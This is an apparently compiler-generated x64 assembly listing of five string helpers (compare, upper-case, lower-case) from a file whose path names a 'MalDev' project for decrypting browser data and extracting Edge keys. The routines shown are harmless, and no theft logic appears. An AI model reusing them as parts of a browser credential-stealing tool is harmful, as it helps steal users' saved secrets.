_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
s1$ = 32
s2$ = 40
?CompareStringA@@YA_NPEBD0@Z PROC			; CompareStringA
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 58
$LN8:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 59
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@CompareStr
$LN2@CompareStr:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@CompareStr:
; Line 60
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s1$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN5@CompareStr
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s2$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN5@CompareStr
; Line 61
	mov	al, 1
	jmp	SHORT $LN1@CompareStr
$LN5@CompareStr:
; Line 63
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s1$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s2$[rsp]
	movsx	ecx, BYTE PTR [rdx+rcx]
	cmp	eax, ecx
	je	SHORT $LN6@CompareStr
; Line 64
	xor	al, al
	jmp	SHORT $LN1@CompareStr
$LN6@CompareStr:
; Line 66
	jmp	SHORT $LN2@CompareStr
$LN1@CompareStr:
; Line 67
	add	rsp, 24
	ret	0
?CompareStringA@@YA_NPEBD0@Z ENDP			; CompareStringA
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
s$ = 32
?UpperStringW@@YA_NPEA_W@Z PROC				; UpperStringW
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 45
$LN8:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 46
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@UpperStrin
$LN2@UpperStrin:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@UpperStrin:
; Line 47
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN5@UpperStrin
; Line 48
	jmp	SHORT $LN3@UpperStrin
$LN5@UpperStrin:
; Line 50
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	cmp	eax, 97					; 00000061H
	jl	SHORT $LN6@UpperStrin
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	cmp	eax, 122				; 0000007aH
	jg	SHORT $LN6@UpperStrin
; Line 51
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	sub	eax, 32					; 00000020H
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s$[rsp]
	mov	WORD PTR [rdx+rcx*2], ax
$LN6@UpperStrin:
; Line 53
	jmp	SHORT $LN2@UpperStrin
$LN3@UpperStrin:
; Line 55
	mov	al, 1
; Line 56
	add	rsp, 24
	ret	0
?UpperStringW@@YA_NPEA_W@Z ENDP				; UpperStringW
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
s$ = 32
?UpperStringA@@YA_NPEAD@Z PROC				; UpperStringA
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 32
$LN8:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 33
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@UpperStrin
$LN2@UpperStrin:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@UpperStrin:
; Line 34
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN5@UpperStrin
; Line 35
	jmp	SHORT $LN3@UpperStrin
$LN5@UpperStrin:
; Line 37
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 97					; 00000061H
	jl	SHORT $LN6@UpperStrin
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 122				; 0000007aH
	jg	SHORT $LN6@UpperStrin
; Line 38
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	sub	eax, 32					; 00000020H
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s$[rsp]
	mov	BYTE PTR [rdx+rcx], al
$LN6@UpperStrin:
; Line 40
	jmp	SHORT $LN2@UpperStrin
$LN3@UpperStrin:
; Line 42
	mov	al, 1
; Line 43
	add	rsp, 24
	ret	0
?UpperStringA@@YA_NPEAD@Z ENDP				; UpperStringA
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
s$ = 32
?LowerStringW@@YA_NPEA_W@Z PROC				; LowerStringW
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 19
$LN8:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 20
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@LowerStrin
$LN2@LowerStrin:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@LowerStrin:
; Line 21
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN5@LowerStrin
; Line 22
	jmp	SHORT $LN3@LowerStrin
$LN5@LowerStrin:
; Line 24
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	cmp	eax, 65					; 00000041H
	jl	SHORT $LN6@LowerStrin
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	cmp	eax, 90					; 0000005aH
	jg	SHORT $LN6@LowerStrin
; Line 25
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	add	eax, 32					; 00000020H
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s$[rsp]
	mov	WORD PTR [rdx+rcx*2], ax
$LN6@LowerStrin:
; Line 27
	jmp	SHORT $LN2@LowerStrin
$LN3@LowerStrin:
; Line 29
	mov	al, 1
; Line 30
	add	rsp, 24
	ret	0
?LowerStringW@@YA_NPEA_W@Z ENDP				; LowerStringW
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
s$ = 32
?LowerStringA@@YA_NPEAD@Z PROC				; LowerStringA
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 5
$LN8:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 6
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@LowerStrin
$LN2@LowerStrin:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@LowerStrin:
; Line 7
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN5@LowerStrin
; Line 8
	jmp	SHORT $LN3@LowerStrin
$LN5@LowerStrin:
; Line 11
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 65					; 00000041H
	jl	SHORT $LN6@LowerStrin
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 90					; 0000005aH
	jg	SHORT $LN6@LowerStrin
; Line 12
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	add	eax, 32					; 00000020H
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s$[rsp]
	mov	BYTE PTR [rdx+rcx], al
$LN6@LowerStrin:
; Line 14
	jmp	SHORT $LN2@LowerStrin
$LN3@LowerStrin:
; Line 16
	mov	al, 1
; Line 17
	add	rsp, 24
	ret	0
?LowerStringA@@YA_NPEAD@Z ENDP				; LowerStringA
_TEXT	ENDS
END
